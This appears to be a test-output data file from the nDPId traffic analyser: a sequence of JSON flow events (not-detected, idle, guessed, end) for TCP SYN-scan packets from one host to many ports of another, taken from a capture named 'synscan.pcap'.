-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 